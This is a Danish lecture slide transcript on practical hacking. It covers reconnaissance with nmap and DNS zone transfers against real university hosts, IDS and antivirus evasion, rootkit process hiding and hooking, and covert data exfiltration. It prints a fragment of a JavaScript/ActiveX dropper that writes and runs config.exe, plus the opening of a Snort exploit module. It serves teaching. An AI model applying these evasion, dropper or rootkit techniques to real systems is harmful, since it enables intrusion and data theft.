IT Arkitektur og Sikkerhed Praktisk Hacking. Hvem er jeg Hvem er Jørgen Hjort? Senior sikkerhedskonsulent og CISSP hos Ezenta Har arbejdet med IT sikkerhed.

Præsentationer af emnet: "IT Arkitektur og Sikkerhed Praktisk Hacking. Hvem er jeg Hvem er Jørgen Hjort? Senior sikkerhedskonsulent og CISSP hos Ezenta Har arbejdet med IT sikkerhed."— Præsentationens transcript:

1 IT Arkitektur og Sikkerhed Praktisk Hacking

2 Hvem er jeg Hvem er Jørgen Hjort? Senior sikkerhedskonsulent og CISSP hos Ezenta Har arbejdet med IT sikkerhed og software udvikling i mere end 15 år Specialer Penetration Testing White hacking Reversing Forensic Teaching Secure coding Code security reviews Software Development

3 Praktisk hacking Indhold Sløring Rekognoscering Exploits / sårbarheder Kompromittering Sløring af indtrængning Ekstraktion af oplysninger Konsolidering af adgang

4 Overordnet forløb Målrettede hackere Fritidshackere eller hackere der bruger hackede maskiner som platform (f.eks. til spam eller afpresning) Find målmaskiner Find exploits Hack maskiner Find maskiner Find exploits Hack maskiner

5 Praktisk hacking Sløring Proxyer Åbne Access Points (wifi) Anonymiserende netværk (tor, hushmail) Hackede computere For ikke at afsløre sit udgangspunkt, og dermed sig selv, benytter man typisk mellemstationer.

6 Praktisk hacking (sløring) Proxyer

7 Praktisk hacking (sløring) Åbne Access Points

8 Praktisk hacking (sløring) Tor http://tor.eff.org

9 Praktisk hacking Rekognoscering Offentlige oplysninger (netcraft, google hacking, dns, ripe) Aktiv (nmap, nessus) Passiv (trådløs sniffning) Der er flere forskellige måder at finde sine mål på.

10 Praktisk hacking (rekognoscering) Ripe opslag $ host www.itu.dk www.itu.dk is an alias for tintin.itu.dk. tintin.itu.dk has address 130.226.142.6 http://ripe.net/fcgi- bin/whois?searchtext=130.226.142.6&submit=Search: inetnum: 130.226.0.0 - 130.226.255.255 netname: FSKNET-130-226 descr: Danish Network for Research and Education descr: UNI-C descr: DK-2800 Lyngby country: DK admin-c: unic1-ripeunic1-ripe tech-c: unic1-ripeunic1-ripe status: ASSIGNED PA remarks: Details of IP-adresses of selected institutions are remarks: available at http://info.net.uni-c.dk/ip.htmlhttp://info.net.uni-c.dk/ip.html ITU: IT-Højskolen i København 130.226.132.0 - 130.226.133.255

11 Praktisk hacking (rekognoscering) DNS opslag $ host -l itu.dk ns.itu.dk … videokonf.itu.dk has address 130.226.143.18 vpn.itu.dk has address 130.226.142.250 vpnpriv.itu.dk has address 130.226.142.15 webcal.itu.dk is an alias for tintin.itu.dk. webfaktura.itu.dk is an alias for tintin.itu.dk. webmail.itu.dk is an alias for pluto.itu.dk. whaddayouthinkyouredoingyoubastard.itu.dk has address 130.226.142.122 wolverine.itu.dk has address 130.226.142.16 www.itu.dk is an alias for tintin.itu.dk. www1.itu.dk has address 217.116.230.39 wwwadm.itu.dk is an alias for ssh.itu.dk. xcvs.itu.dk has address 130.226.142.117 ypserver.itu.dk is an alias for asterix.itu.dk. itu.dk SOA ns.itu.dk. hostmaster.itu.dk. 2005110201 28800 7200 172800 86400 $

12 Praktisk hacking (rekognoscering) Netcraft

13 Praktisk hacking (rekognoscering) Google Hacking

14 Praktisk hacking (rekognoscering) nmap # nmap -sS -sV test.xxx.dk Starting nmap 3.93 ( http://www.insecure.org/nmap/ ) at 2005-11-07 01:29CET Interesting ports on 217.157.13.136: (The 1662 ports scanned but not shown below are in state: closed) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.9p1 Debian-1ubuntu2 (protocol 2.0) 25/tcp open smtp Postfix smtpd 80/tcp open http Apache httpd 2.0.53 ((Ubuntu)PHP/4.3.10- 10ubuntu4.1) 143/tcp open imap Courier Imapd (released 2004) 993/tcp open ssl OpenSSL 3306/tcp open mysql MySQL 4.0.23_Debian-3ubuntu2.1-log MAC Address: 00:80:AD:00:49:9E (Cnet Technology) Service Info: Host: mail.rhave.dk Nmap finished: 1 IP address (1 host up) scanned in 26.088 seconds

15 Praktisk hacking (rekognoscering) nmap ping-sweep # nmap -sP 130.226.142.0/23 Starting nmap 3.75 ( http://www.insecure.org/nmap/ ) at 2005-11-09 14:49 CET Host 130.226.142.0 seems to be a subnet broadcast address (returned 1 extra pings). Host 130.226.142.1 appears to be up. Host rogue.itu.dk (130.226.142.2) appears to be up. Host ns2.itu.dk (130.226.142.3) appears to be up. Host tarzan.itu.dk (130.226.142.4) appears to be up. Host superman.itu.dk (130.226.142.5) appears to be up. Host tintin.itu.dk (130.226.142.6) appears to be up. Host hulk.itu.dk (130.226.142.7) appears to be up. Host hydra.itu.dk (130.226.142.8) appears to be up. Host 130.226.142.9 appears to be up. Host 130.226.142.10 appears to be up. Host r2d2.linuxlab.dk (130.226.142.11) appears to be up. Host c3po.linuxlab.dk (130.226.142.12) appears to be up. Host nightcrawler.itu.dk (130.226.142.13) appears to be up. Host vpnpriv.itu.dk (130.226.142.15) appears to be up. Host wolverine.itu.dk (130.226.142.16) appears to be up. Host pluto.itu.dk (130.226.142.18) appears to be up. Host 130.226.142.31 appears to be up. Host 130.226.142.96 seems to be a subnet broadcast address (returned 1 extra pings). Host 130.226.142.97 appears to be up.

16 Praktisk hacking (rekognoscering) nmap ping-sweep Host dkm.itu.dk (130.226.142.100) appears to be up. Host sigchi.itu.dk (130.226.142.101) appears to be up. Host dialogical.itu.dk (130.226.142.103) appears to be up. Host hug.itu.dk (130.226.142.104) appears to be up. Host doi.itu.dk (130.226.142.105) appears to be up. Host ds.itu.dk (130.226.142.106) appears to be up. Host abs.itu.dk (130.226.142.108) appears to be up. Host gamestudies.itu.dk (130.226.142.109) appears to be up. Host hit.itu.dk (130.226.142.110) appears to be up. Host battlefield.itu.dk (130.226.142.111) appears to be up. Host rmj1.itu.dk (130.226.142.112) appears to be up. Host colossus.itu.dk (130.226.142.114) appears to be up. Host cogain.itu.dk (130.226.142.116) appears to be up. Host xcvs.itu.dk (130.226.142.117) appears to be up. Host bigwig.itu.dk (130.226.142.118) appears to be up. Host tlb.itu.dk (130.226.142.119) appears to be up. Host ea.itu.dk (130.226.142.120) appears to be up. Host whaddayouthinkyouredoingyoubastard.itu.dk (130.226.142.122) appears to be up. Host abacus.itu.dk (130.226.142.123) appears to be up. Host bpl2.itu.dk (130.226.142.125) appears to be up. Host lacomoco.itu.dk (130.226.142.130) appears to be up. Host intifada.itu.dk (130.226.142.131) appears to be up. Host logosphere.itu.dk (130.226.142.132) appears to be up. Nmap run completed -- 512 IP addresses (41 hosts up) scanned in 48.905 seconds

17 Praktisk hacking Exploits / sårbarheder Kilder til exploits Offentlige sites / mailinglister (frsirt.com, securityfocus.com, full-disclosure, secunia.dk) Egenudvikling (hårdt arbejde)

18 Praktisk hacking (exploits) Offentlige hjemmesider

19 Praktisk hacking (exploits) Egenudvikling af sårbarheder Der er en række metoder til at finde sårbarheder i programmer: Sourcekode auditering Binær auditering Fuzzing

20 Praktisk hacking (exploits) Egenudvikling af sårbarheder ret ebp (esp)... var_28

21 Praktisk hacking Kompromittering Direkte angreb Firewalls IDS (og IPS) Indirekte angreb mod klientsårbarheder (f.eks. IE-exploits) Personlige firewalls der blokerer udadgående trafik Antivirus (mønstergenkendelse => ændrer mønster)

22 Praktisk hacking (kompromittering) Firewalls Firewalls er en moden teknologi, der er rigtigt gode til at udføre deres funktion. Det er hovedsageligt DoS angreb der findes i moderne produkter, de sjældne gange det sker. DoS angreb Fragment angreb Flood angreb Det kan typisk være nødvendigt at benytte andre angrebsmetoder (f.eks. indirekte angreb) hvis ordentlige firewalls blokerer den direkte vej.

23 Praktisk hacking (kompromittering) Intrusion Detection Systemer (IDS) Problemet med IDS er detektion, men IDS er heldigvis typisk mønsterbaseret, og kan derfor omgås. Modifikation af kendte exploits kan gøre at de går igennem udetekteret Fragmentering kan narre IDS Fejl i IDS kan lede til crash, send ’disable’-pakker før rigtigt angreb

24 Praktisk hacking (kompromittering) Snort Advisory ID : FrSIRT/ADV-2005-2138 CVE ID : CVE-2005-3252 Rated as : Critical Remotely Exploitable : Yes Locally Exploitable : Yes Release Date : 2005-10-18CVE-2005-3252Critical Technical Description A vulnerability has been identified in Snort, which could be exploited by remote attackers to execute arbitrary commands. This flaw is due to a stack overflow error in the Back Orifice pre-processor when determining the direction (to or from server) of a specially crafted UDP packet, which could be exploited by remote unauthenticated attackers to compromise a vulnerable system or network monitored by Snort. Affected Products Snort versions 2.4.0 through 2.4.2

25 Praktisk hacking (kompromittering) Snort Snort Back Orifice Pre-processor Remote Buffer Overflow Exploit (Win32) Date : 25/10/2005 Advisory : FrSIRT/ADV-2005-2138FrSIRT/ADV-2005-2138 Rated as : Critical Critical ############################################### # for educational purpose only # by Kira ############################################### package Msf::Exploit::snort_bo_overflow_win32; use base 'Msf::Exploit'; use strict; use Pex::Text; my $holdrand; my $advanced = {}; my $info = { 'Name' => 'Snort Back Orifice Preprocessor Overflow', 'Version' => '$Revision: 1.0 $', 'Authors' => [ 'Trirat Puttaraksa (Kira) ', ], 'OS' => ['win32', 'win2000', 'winxp', 'win2003'],.........

26 Praktisk hacking (kompromittering) Personlige firewalls Typisk mindre software firewalls der kun beskytter en enkelt maskine Beskytter også mod udadgående trafik Hovedsageligt kun brugt på Windows maskiner, hvilket gør det nemmere at få data ud fra Linux/Unix/BSD maskiner Flere måder at omgå disse på: Piggybacking på tilladte programmer Send data fra lave netværkslag (NDIS)

27 Praktisk hacking (kompromittering) Zonealarm ZoneAlarm Personal Firewall Program Control Feature Bypass Secunia Advisory:SA17450 Release Date:2005-11-09 Critical:Not criticalNot critical Impact:Security Bypass Where:Local system Solution Status:Unpatched Software:ZoneAlarm Anti-Spyware 6.x ZoneAlarm Antivirus 6.x ZoneAlarm Internet Security Suite 6.x ZoneAlarm Pro 6.x Description: Debasis Mohanty has discovered a weakness in various ZoneAlarm products, which can be exploited to bypass security features provided by the product. The weakness is caused due to the Program Control feature failing to correctly identify and stop processes that use the Internet Explorer browser to make outgoing connections via the "ShowHTMLDialog()" API in MSHTML.DLL. This may be exploited by malware to send potentially sensitive information out from an affected system.ZoneAlarm Anti-Spyware 6.x ZoneAlarm Antivirus 6.x ZoneAlarm Internet Security Suite 6.x ZoneAlarm Pro 6.x …

28 Praktisk hacking (kompromittering) Antivirus Antivirus programmer kontrollerer typisk filadgang, men baserer sig heldigvis typisk på mønstergenkendelse. Selv små variationer kan narre mange AV produkter.

29 Praktisk hacking (kompromittering) Eksempel på AV mønster <!-- hide for safe browsers InterfaceObject=document.applets[0]; setTimeout("ownload()",5000); function ownload() { fsoClassID="{0D43FE01-F093-11CF-8940-00A0C9054228}"; InterfaceObject.setCLSID(fsoClassID); fso = InterfaceObject.createInstance(); windir = fso.getspecialfolder(0); filename = "\\config.exe"; if (fso.FileExists(windir+filename) == false) { file = fso.opentextfile(windir+filename, "2", "TRUE") file.write(FileContent) file.close() setTimeout("Run()",500) } …

30 Praktisk hacking (kompromittering) Eksempel på AV mønster <APPLET code="com.ms.activeX.ActiveXComponent" WIDTH=0 HEIGHT=0> <!-- hide for safe browsers InterfaceObject=document.applets[0]; setTimeout("ownload()",5000); function ownload() { fsoClassID="{0D43FE01-F093-11CF-8940-00A0C9054228}"; InterfaceObject.setCLSID(fsoClassID); fso = InterfaceObject.createInstance(); windir = fso.getspecialfolder(0); filename = "\\config.exe"; if (fso.FileExists(windir+filename) == false) { file = fso.opentextfile(windir+filename, "2", "TRUE") file.write(FileContent) file.close() setTimeout("Run()",500) } …

31 Praktisk hacking Rootkits Efter kompromittering har man typisk brug for en base på den hackede maskine til at udføre det videre arbejde igennem. Til dette benyttes typisk et Rootkit. Basalt set er det blot en teknologi der har til formål at skjule en angribers værktøjer Eksempler: FU_rootkit (Windows, rootkit.com) t0rn (Linux)

32 Praktisk hacking (rootkits) Sløring af indtrængning Rootkits benyttes bl.a. til at skjule: filer / foldere netværksforbindelser processer logentries

33 Operativ System Design Intel har 4 privilege levels eller “rings” Windows og de fleste andre OS bruger kun 2 ringe (0 og 3)

34 Operativ System Design Ved kun at bruge to privilegium niveauer, er der ingen separation mellem kernen selv og 3.part drivers og LKM Drivers kan modificere hukommelsen associeret med kerne obkelter, så som processers tokens, mv

35 Operativ System Design User Land Operating system provides common API for developers to use Kernel32.dll Ntdll.dll Kernel Mode The low level kernel functions that implement the services needed in user land Protected memory containing objects such as those for processes, tokens, ports, etc.

36 Windows arkitektur Service Control Manager Task Manager NTDLL.DLL Security Reference Monitor Processes & Threads Config Manager(registry) (Kernel mode callable interfaces) I/O Mgr User Mode System ProcessesServicesApplications LSASSExplorer Winlogon User applications Session Manager Services.exe Kernel Mode Device & File Sys Drivers Kernel Hardware Abstraction Layer NTDLL.DLL – User mode rootkit hooks Kernel – Kernel mode rootkit hooks

37 Windows User-Land Rootkits Remote Code Injection Remote Thread Injection Maximum størrelse af remote thread er 4kb (Default størrelse på en page af virtual memory) En måde at kopiere kode til en anden process' adresse område og så få den udført i kontekst af denne process Det involverer brug af remote threads og WriteProcessMemory API Man kopierer koden via WriteProcessMemory, og starter dets ekskvering med CreateRemoteThread

38 Windows User-Land Rootkits Remote Code Injection Hvad er en IAT Table? PE (Portable Executable) Format en global tabel der indeholder en liste af alle funktionespointere til enhver funktion der er mapped ind i den kørende process Denne tabel er unik per process

39 Windows User-Land Rootkits Remote Code Injection Hvad er “function hooking”? Redirigering af en pointer til en egen ondsindet funktion. Kaldes også “function proxying” To former for “Function Proxying” Pointer Patching (easily detected) Detour Patching (harder to detect)

40 40 Rootkit Pointer Patching Operativ systemer bruger globale tabeller til at holde styr på alle funktioner der er tilgængelige indefra en process Ved at modificere en af disse pointere til at page på ens egen “proxy” funktion, kan man intercept’e requests og parse resultater

41 Rootkit Detour Patching Hvad er detour patching? Ved direkte at modificere de første få bytes (7) efter funktionsstarten i memory kan man introducere en “detour” Detour: FAR JMP 0xDEADBEAF Hvor 0xDEADBEAF er en 4-byte pointer til ens ondsindede proxy funktion Total patch størrelse: 7 bytes

42 Detours

43 Windows Kernel-Land Rootkits Kernel-Land Rootkits A malicious Kernel Driver De fleste funktioner man ønsker at monitore eller ændre ved er direkte tilgængelige i Kernel-Land Funktioner findes SSDT (System Service Descriptor Table) Ligner User-Land IAT Table

44 Windows Kernel-Land Rootkits Kernel-Land Rootkits En ondsindet Kernel Driver “Hook’er” en eksporteret Kerne API funktion for at monitorere resultater Detour Patching af Kernel API functions Hooking interrupts

45 Linux Rootkits History User-Land SSHEater-1.1 by Carlos Barros Kernel-Land Static-X’s Adore-NG 2.4/2.6 kernel rootkit Rebel’s phalanx (patches /dev/mem) rebel@blacksecurity.org

46 Praktisk hacking (rootkits) t0rn "The t0rn rootkit replaces several binaries on the system in order to hide itself. Here are the binaries that it replaces: du find ifconfig in.telnetd in.fingerd login ls mjy netstat ps pstree top A setuid shell is placed in /usr/man/man1/man1/lib/.lib/.x"

47 Mac OSX Rootkits History Still in early stages of research Nemo released WeaponX as an original Proof-of-Concept Mac responded by hardening their O/S Internals Nemo responded (like any self-respecting blackhat) with his own improved rootkit

48 Hiding Processes - Windows KPRCB *CurrentThread *NextThread *IdleThread ETHREAD KTHREAD ApcState EPROCESS KPROCESS LIST_ENTRY { FLINK BLINK } EPROCESS KPROCESS LIST_ENTRY { FLINK BLINK } EPROCESS KPROCESS LIST_ENTRY { FLINK BLINK }

49 Hiding Processes - Windows Locate the Processor Control Block (KPRCB) Located at 0xffdff120 fs register in kernel mode points to 0xffdff000 Within the KPRCB is a pointer to the Current Thread block (ETHREAD) Located at fs:[124] or 0xffdff124 An ETHREAD contains a KTHREAD structure

50 Hiding Processes - Windows The KTHREAD structure contains a pointer to the EPROCESS block of the current process The EPROCESS block contains a LIST structure, which has a forward and backward pointer to active processes This creates the doubly linked list of active processes in Windows

51 Hiding Processes - Windows To hide a process Locate the EPROCESS block of the process to hide Change the process behind it to point to the process after the process you are hiding Change the process after it to point to the process before the one you are trying to hide Essentially, the list of active now processes points “around” the hidden process

52 Hiding Processes - Windows

53 Control Flow - Places to Hook Kernel32 CreateFileW NTDLL NtCreateFile User Land Kernel

54 Control Flow - Places to Hook User Land Kernel IDT 2E &NtCreateFile NtCreateFile { push ebp mov ebp, esp xor eax, eax push eax … } System Call Table

55 Praktisk hacking (rootkits) Sony rootkit "I studied the driver’s initialization function, confirmed that it patches several functions via the system call table and saw that its cloaking code hides any file, directory, Registry key or process whose name begins with “$sys$”. " - Mark's Sysinternals Blog (www.sysinternals.com)

56 2. Generation Rootkits – Hardware Interrupt Split TLB Memory cloaking Pioneret af Greg Hoglund Jamie Butler

57 Hiding Processes - Windows Locate the Processor Control Block (KPRCB) Located at 0xffdff120 fs register in kernel mode points to 0xffdff000 Within the KPRCB is a pointer to the Current Thread block (ETHREAD) Located at fs:[124] or 0xffdff124 An ETHREAD contains a KTHREAD structure

58 Faking Read / Writes By Exploiting The Split TLB (1) Normal Synchronized ITLB and DTLB translate code and data memory accesses to the same physical frame. Memory Access (VPN=12) ITLB DTLB Frame 2 Page Table / Page Dir 27 (Invalid)FAULT27 (Invalid) Is it a code access? Is it a data access? VPN = 12, Frame = 2 Frame 8 Frame 52

59 Faking Read / Writes By Exploiting The Split TLB (2) Desynchronized ITLB and DTLB translate code and data memory accesses to different physical frames. Memory Access (VPN=12) ITLB DTLB Frame 2 Page Table / Page Dir 27 (Invalid)FAULT27 (Invalid) Is it a code access? Is it a data access? VPN = 12, Frame = 52 VPN = 12, Frame = 2 Frame 8 Frame 52 rootkit code random garbage

60 3. Generation Rootkits – Hardware Virtualization (Hypervisor) Pioneret af Joanna Rutkowska Alexander Tereshkin

61 61 The heart of SVM: VMRUN instruction

62 62 © Invisible Things Lab, 2007 Blue Pill – ideen bag Udnytter AMD SVM extensions til at flytte operativ systemet ind i en virtual maskine (on-the-fly) Benytter thin hypervisor til at kontrollere OS Hypervisor er ansvarlig for at kontrollere “interessante” event inde i gæste OS

63 63 © Invisible Things Lab, 2007 SVM SVM er et sæt af instruktioner der kan bruges til at implementere Secure Virtual Machines on AMD MSR EFER register: bit 12 (SVME) kontrolerer om SVM mode er enabled eller ikke EFER.SVME skal være sat til 1 før eksekvering af en SVM instruction. Reference: AMD64 Architecture Programmer’s Manual Vol. 2: System Programming Rev 3.11 http://www.amd.com/us-en/assets/content_type/white_papers_and_tech_docs/24593.pdf

64 64 Blue Pill Ide (simplificeret)

65 65 © Invisible Things Lab, 2007 BP installerer sig selv on-the-fly Hovediden bag BP er at den installerer sig selv on-the-fly Så, ingen modifikationer af BIOS, boot sector eller system filer er nødvendig BP overlever per default ikke system reboot

66 4.Generation Rootkits Intel System Management Mode (SMM) 2008 -

67 De skjuler sig selv I SSM området SMM er mere privilegeret end en hypervisor, og kan ikke kontrolleres af et Operativ System. Operativ Systemer kan ikke override eller disable System Management Interrupt (SMI) kald 4.Generation Rootkits

68 I praktisk kan man kun vide hvad der kører I SMM området ved at fysisk disassemble firmwaren i computeren. 4.Generation Rootkits

69 €45

70 Praktisk hacking (rootkits) Ekstraktion af oplysninger Dokumenter Logs Gemte password Mails …

71 Simpel Data Ekstraktion Remote Shell – A TCP session connected to the native command interpreter on the system Windows: cmd.exe UNIX: /bin/sh or /bin/bash PRO: Simpelt CON: Data sendes “in the clear”

72 “Out of the box” Ekstraktion Brug en eksisterende løsning Example: Back Orifice 2000 PROS: Fully featured No programming skills required (attractive for the script kiddies) CONS: May be overkill (i.e. large footprint) Easily detectable by AV / IDS systems Not extensible or customizable

73 Vi behøver en mere stealthy måde Definition: covert channel: “A covert channel is a communication channel that allows a process to transfer information in a manner that violates the system's security policy". [DOD_1985], [NCSC_1993], [Rowland_1996].

74 Covert Channels Network Based Covert Channels Designet til ekstraktion af data på tværs af netværk Kan være passive eller aktive kanaler Host Based Covert Channels Designet til skjult data ekstraktion og kommunikation mellem processer på et lokalt system

75 Passive Covert Channels Passive Channels: Passive covert channels don’t generate new packets. Undnytter en anden protocol architecture til at steganograpically embed channel data PRO: Genererer ikke suspekt netværkstrafik CON: Afhængig af hvor meget trafik der flyder i forvejen, og hvor meget information der kan pakkes sammen i en given protokol

76 Steganography Definition: steganography: “The art and science of hiding information by embedding messages within other, seemingly harmless messages. Steganography works by replacing bits of useless or unused data in regular computer files (such as graphics, sound, text, HTML, or even floppy disks ) with bits of different, invisible information. This hidden information can be plain text, cipher text, or even images.”

77 www.komoku.com Active Covert Channels Aktive kanaler: Generer ny trafik I stedet for piggy backing på eksisterende trafik PRO: Kræver mere båndbredde end passive kanaler CON: Er mere sandsynlig til at trigge en NIDS Send ikke ekstrakteret data “in the clear” Need to “blend in” with existing network traffic

78 Et simpelt men praktisk eksempel Barnaby Jack at eEye describes a kernel-level key-logger that can return the captured keystrokes covertly to a remote user Erstattet keyboard interrupt handler med en scancode capture rutine Patcher ICMP handler i TCPIP.SYS

79 Patching the TCP.sys ICMP Handler How does ICMP work? The client computer brews up an ICMP Echo Request packet and sends it to the target computer. The target machine, upon receipt of the ICMP Echo Request builds a corresponding ICMP Echo Reply packet and sends it back to the client computer. Exploiting ICMP We can overwrite the ICMP Echo Response handler to replace the buffer with a pointer to a buffer containing captured keystrokes Sending an ICMP Echo Request to the remote system will now return the captured keystrokes in ICMP Echo Response packet

80 DNS Min egen favorit – DNS Har brugt flere gange i den virkelige verden

81 Praktisk hacking (rootkits) Konsolidering af adgang Installation af bagdøre Rootkits

82 Praktisk hacking (rootkits) Videre brug af maskiner Spam / open relays Proxy DDoS Distribuerede beregninger

83 Praktisk hacking Eksempel på bot-net Phpbb include vuln scanning, via Google, generating new IRC botnet (NEW) Published: 2005-11-10, Last Updated: 2005-11-10 01:24:27 UTC by Patrick Nolan (Version: 3(click to highlight changes))3(click to highlight changes) We have received two reports of systems being exploited via a phpbb include vulnerability and a "new" IRC bot is installed. Please update your files now. Phpbb forum support guru "Techie-Micheal" points out that "running update_to_latest.php on their install only updates the database (and is clearly stated in the documentation), files need to be updated seperately for which there are several methods". The scanning is for phpbb versions 2.0.10 and under. The latest version of phpbb is 2.0.18. Micheal also notes "- In past bots, the bots would run as an "SSL'ed Apache. This one is a bit different; my $processo = '/usr/local/firewall'". The new IRC bot scans for vulnerable systems using Google, when successful it announces that "oopz and sirh0t and Aleks g0t pwned u!", and has UDP flooding and UDP/ICMP/TCP scanning capabilities.Phpbb

84 Praktisk hacking Variationer Hacking vha. fysisk adgang Social Engineering USB nøgler case story Internet shop Dual-home server (to eller flere netkort)

85 Og så… Til gruppe arbejde